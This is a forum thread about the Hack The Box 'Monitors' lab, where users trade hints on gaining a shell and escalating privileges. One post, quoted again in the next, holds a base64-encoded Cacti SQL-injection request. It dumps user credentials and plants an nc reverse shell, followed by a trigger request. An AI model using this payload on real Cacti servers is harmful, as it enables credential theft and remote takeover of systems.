TUTORIAL Monitors - Hackthebox
by sanakasa - April 24, 2021 at 09:28 PM
#25
(April 25, 2021 at 08:11 PM)davebrew2 Wrote: Are you terminating the payload you’re setting via SQLi with a semicolon? Cacti will add a few arguments when executing, which could spoil it otherwise. If you mess this up you may have to reset the box.

That SQLi shell was unattended and fixed no? I had a shell earlier today but it doesn't work anymore...
Reply
#26
Just done a box reset and still working fine for me.
Reply
#27
(April 25, 2021 at 09:09 PM)davebrew2 Wrote: Just done a box reset and still working fine for me.


Weird, been trying and it didn't work, retried now and he did... Anyway thanks !
Reply
#28
(April 25, 2021 at 09:17 PM)mkassovitz Wrote:
(April 25, 2021 at 09:09 PM)davebrew2 Wrote: Just done a box reset and still working fine for me.


Weird, been trying and it didn't work, retried now and he did... Anyway thanks !

cannot send SQLi as Raidforums blocks SQLi in the post, sending base64-ed so decode it correct your box's IP:PORT and use.. it works for me still

R0VUIC9jYWN0aS9jb2xvci5waHA/YWN0aW9uPWV4cG9ydCZoZWFkZXI9ZmFsc2UmZmlsdGVyPTEn
KStVTklPTitTRUxFQ1QrMSx1c2VybmFtZSxwYXNzd29yZCw0LDUsNiw3K2Zyb20rdXNlcl9hdXRo
O3VwZGF0ZStzZXR0aW5ncytzZXQrdmFsdWU9J3JtKy90bXAvZiUzYm1rZmlmbysvdG1wL2YlM2Jj
YXQrL3RtcC9mfC9iaW4vc2grLWkrMj4lMjYxfG5jKzEwLjEwLlguWSsxMzM3Kz4vdG1wL2Y7Jyt3
aGVyZStuYW1lPSdwYXRoX3BocF9iaW5hcnknOy0tKy0gSFRUUC8xLjEK

then

GET /cacti/host.php?action=reindex&host_id=1 HTTP/1.1
Reply
#29
(April 25, 2021 at 09:29 PM)TDis7 Wrote:
(April 25, 2021 at 09:17 PM)mkassovitz Wrote:
(April 25, 2021 at 09:09 PM)davebrew2 Wrote: Just done a box reset and still working fine for me.


Weird, been trying and it didn't work, retried now and he did... Anyway thanks !

cannot send SQLi as Raidforums blocks SQLi in the post, sending base64-ed so decode it correct your box's IP:PORT and use.. it works for me still

R0VUIC9jYWN0aS9jb2xvci5waHA/YWN0aW9uPWV4cG9ydCZoZWFkZXI9ZmFsc2UmZmlsdGVyPTEn
KStVTklPTitTRUxFQ1QrMSx1c2VybmFtZSxwYXNzd29yZCw0LDUsNiw3K2Zyb20rdXNlcl9hdXRo
O3VwZGF0ZStzZXR0aW5ncytzZXQrdmFsdWU9J3JtKy90bXAvZiUzYm1rZmlmbysvdG1wL2YlM2Jj
YXQrL3RtcC9mfC9iaW4vc2grLWkrMj4lMjYxfG5jKzEwLjEwLlguWSsxMzM3Kz4vdG1wL2Y7Jyt3
aGVyZStuYW1lPSdwYXRoX3BocF9iaW5hcnknOy0tKy0gSFRUUC8xLjEK

then

GET /cacti/host.php?action=reindex&host_id=1 HTTP/1.1



Yup that's what I've been struggling to run but it works now thanks!!

Now I'm back at trying to understand that crontab and how I can mess with it, unfortunatly we cannot write anywhere so I'm stuck atm :/
Reply
#30
[quote="chilly" pid='3766571' dateline='1619327042']
got user, now to figure out this note
[/quote

any nudge how to privesc to marcus, pls?
Reply
#31
Look for anything unusual in marcus' home directory, do some enumeration and follow your instincts. You can access more than it might first appear.
Reply
#32
(April 25, 2021 at 09:52 PM)davebrew2 Wrote: Look for anything unusual in marcus' home directory, do some enumeration and follow your instincts. You can access more than it might first appear.


I swear I don't see it. Hidden directories I cannot access, bashrc file with nothing suspicious imo... I have no clue for that user :(
Reply
#33
any nudge for root? Been working on docker applications but got nothing yet.
Reply
#34
(April 25, 2021 at 11:30 PM)iristen Wrote: any nudge for root? Been working on docker applications but got nothing yet.

Are you inside the container?
Reply
#35
(April 26, 2021 at 01:18 AM)airspitter Wrote:
(April 25, 2021 at 11:30 PM)iristen Wrote: any nudge for root? Been working on docker applications but got nothing yet.

Are you inside the container?

No... not very familiar with docker. How do I get into it?
Reply
#36
(April 26, 2021 at 01:24 AM)iristen Wrote:
(April 26, 2021 at 01:18 AM)airspitter Wrote:
(April 25, 2021 at 11:30 PM)iristen Wrote: any nudge for root? Been working on docker applications but got nothing yet.

Are you inside the container?

No... not very familiar with docker. How do I get into it?

Check what services are running on the machine. Any ports open only locally?
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Monitors: root part for free siracuso 26 4,063 May 01, 2021 at 08:56 AM
Last Post: hhy
TUTORIAL Monitors HTB Detailed Writeup 0xmahesh 0 1,105 April 29, 2021 at 03:27 PM
Last Post: 0xmahesh
TUTORIAL Monitors Detailed Writeup Jockerjock 1 1,047 April 29, 2021 at 03:23 PM
Last Post: 0xmahesh

 Users browsing this thread: 3 Guest(s)